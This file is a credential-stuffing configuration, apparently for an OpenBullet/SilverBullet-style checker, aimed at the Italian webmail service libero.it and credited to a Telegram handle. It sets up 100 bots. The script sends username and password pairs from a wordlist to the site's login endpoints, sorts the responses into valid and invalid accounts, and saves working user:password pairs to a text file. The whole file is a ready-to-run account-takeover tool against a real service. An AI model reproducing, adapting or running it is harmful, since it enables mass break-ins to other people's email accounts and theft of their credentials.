[SETTINGS]
{
  "Name": "libero.it verify ༺❨𝓕𝓻𝓮𝓭𝓮𝓻𝓲𝓬𝓴 𝓢𝓶𝓯❩༻",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-07-09T22:53:54.3625008+07:00",
  "AdditionalInfo": "libero.it",
  "RequiredPlugins": [],
  "Author": "t.me/userbtd",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "libero",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://login.libero.it/" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST POST "https://login.libero.it/logincheck.php" 
  CONTENT "way=&LOGINID=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.libero.it" 
  HEADER "Origin: https://login.libero.it" 
  HEADER "Referer: https://login.libero.it/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Inserisci la tua password" 
    KEY "<ADDRESS>" Contains "key.phtml" 
  KEYCHAIN Failure OR 
    KEY "Account errato o non esistente" 
    KEY "Email non inserita." 

REQUEST POST "https://login.libero.it/keycheck.php" 
  CONTENT "LOGINID=<USER>&PASSWORD=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.libero.it" 
  HEADER "Origin: https://login.libero.it" 
  HEADER "Referer: https://login.libero.it/key.phtml" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Password errata." 
  KEYCHAIN Custom "Access" OR 
    KEY "https://mail1.libero.it/appsuite/api/login?action=liberoLogin" 
  KEYCHAIN Success OR 
    KEY "Cambio password" 
    KEY "<ADDRESS>" Contains "sicurezza/password/" 
    KEY "Password attuale" 

SET CAP "libero.it" "<USER>:<PASS>"

#SAVEHITS UTILITY File "LIBERO.IT.txt" AppendLines "<USER>:<PASS>" -> VAR "SAVEHITS" 

